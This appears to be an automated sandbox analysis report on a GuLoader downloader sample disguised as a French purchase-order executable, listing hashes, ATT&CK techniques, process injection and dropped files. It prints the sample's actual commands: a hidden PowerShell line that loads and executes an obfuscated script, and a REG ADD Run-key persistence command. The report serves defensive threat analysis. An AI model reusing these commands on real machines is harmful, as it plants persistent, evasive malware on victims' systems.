guloader | 39e37a6736984b617a47818ffdbd202199c75f769821d4939f1d61dff621098d

General

Target

Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
Size

548KB
MD5

edeb34f392872f3c9e220bc9dcf9ba86
SHA1

e9fb6ff7cd47ec7b08391f4c1ecc1e684bf28ff7
SHA256

39e37a6736984b617a47818ffdbd202199c75f769821d4939f1d61dff621098d
SHA512

f33bc39692838cc94ae0ed6aedddfcecb8fd564de6de0d81a258ece57eba04cb7820f1fe834e48b4e0cbce95409449514bb645e69584ad62e0439fea306af424
SSDEEP

12288:47YvE3TaaFpfEwmgfwwQxeoKGaGsIMcgLvlU2eZysZMNue:bENj7JgaRe0VN9

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Emraud = "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\\Somervillite\\').Efs;%Skraastillinger% ($Boplskommunens)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2436	wab.exe
2436	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2916	powershell.exe
2436	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2916 set thread context of 2436	2916	powershell.exe	32

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2668	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2916	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2916	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 2916	2476	Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe	28
PID 2476 wrote to memory of 2916	2476	Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe	28
PID 2476 wrote to memory of 2916	2476	Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe	28
PID 2476 wrote to memory of 2916	2476	Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe	28
PID 2916 wrote to memory of 2828	2916	powershell.exe	30
PID 2916 wrote to memory of 2828	2916	powershell.exe	30
PID 2916 wrote to memory of 2828	2916	powershell.exe	30
PID 2916 wrote to memory of 2828	2916	powershell.exe	30
PID 2916 wrote to memory of 2436	2916	powershell.exe	32
PID 2916 wrote to memory of 2436	2916	powershell.exe	32
PID 2916 wrote to memory of 2436	2916	powershell.exe	32
PID 2916 wrote to memory of 2436	2916	powershell.exe	32
PID 2916 wrote to memory of 2436	2916	powershell.exe	32
PID 2916 wrote to memory of 2436	2916	powershell.exe	32
PID 2436 wrote to memory of 2112	2436	wab.exe	33
PID 2436 wrote to memory of 2112	2436	wab.exe	33
PID 2436 wrote to memory of 2112	2436	wab.exe	33
PID 2436 wrote to memory of 2112	2436	wab.exe	33
PID 2112 wrote to memory of 2668	2112	cmd.exe	35
PID 2112 wrote to memory of 2668	2112	cmd.exe	35
PID 2112 wrote to memory of 2668	2112	cmd.exe	35
PID 2112 wrote to memory of 2668	2112	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
"C:\Users\Admin\AppData\Local\Temp\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\Admin\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    3⤵
    PID:2828
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2112
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
001d8dc54fc44070a5802ccddcf936be

SHA1
24145a4339203671c9ca6da702730feded3dd4f2

SHA256
018df2e697d2c46bb59306baeaebb722ba1ffefd4dec5dadfc6f0c649a97b0a1

SHA512
15ecd362acf715e520f50317ff01cdb06d7603345bb9d234a8667bb993560b6f96a1cf98cf762edb1226bd24e61d023c1d88c546091270ff31087b857c70f153

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9031.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar9122.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art

Filesize
56KB

MD5
19779840eecfc141420a08cb9a741962

SHA1
0f0a168bc292914da146f667557ff5f07b0f5ae5

SHA256
de1fc8dc64b49c5ae8c2c9c45e7dd4d2aa154f845e99a8e8fa08b5abf23d38a7

SHA512
d3be08e433f93bafc5d53ea6e91c53e01d755bf1c61e4006aa184da35644b343bd72d0ddbee9820db107c2df212dc4a51a4e06ebf3cf6c1e45ed250f2b383723

Download Submit
C:\Users\Admin\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Raciality.Fly

Filesize
331KB

MD5
4fef7ec4aa88c70e0e50af8288552883

SHA1
93fb76eb5d63d8bd92cb962e8f6ca7c8e7ae5950

SHA256
286b9df7b42e7f021bb5eebe1b6e00d6178f01a4b308244cabfd955cd91b5d60

SHA512
9f386415243a791b58853c00c378aa57d3aa69f3e690e452220da92d5b4888a0c35099b20ebc9672b0797bcd58091fca8d1f0bd75a616b164896531b8206b1cb

Download Submit
memory/2436-22-0x0000000077960000-0x0000000077B09000-memory.dmp

Filesize
1.7MB

Download
memory/2436-110-0x0000000002020000-0x000000000764F000-memory.dmp

Filesize
86.2MB

Download
memory/2436-111-0x0000000077B50000-0x0000000077C26000-memory.dmp

Filesize
856KB

Download
memory/2436-26-0x0000000000FB0000-0x0000000002012000-memory.dmp

Filesize
16.4MB

Download
memory/2436-24-0x0000000077B50000-0x0000000077C26000-memory.dmp

Filesize
856KB

Download
memory/2436-23-0x0000000077B86000-0x0000000077B87000-memory.dmp

Filesize
4KB

Download
memory/2916-14-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2916-20-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2916-21-0x0000000077B50000-0x0000000077C26000-memory.dmp

Filesize
856KB

Download
memory/2916-19-0x0000000074250000-0x00000000747FB000-memory.dmp

Filesize
5.7MB

Download
memory/2916-18-0x0000000077960000-0x0000000077B09000-memory.dmp

Filesize
1.7MB

Download
memory/2916-17-0x0000000006740000-0x000000000BD6F000-memory.dmp

Filesize
86.2MB

Download
memory/2916-16-0x0000000005520000-0x0000000005524000-memory.dmp

Filesize
16KB

Download
memory/2916-7-0x0000000074250000-0x00000000747FB000-memory.dmp

Filesize
5.7MB

Download
memory/2916-10-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2916-11-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2916-9-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2916-8-0x0000000074250000-0x00000000747FB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads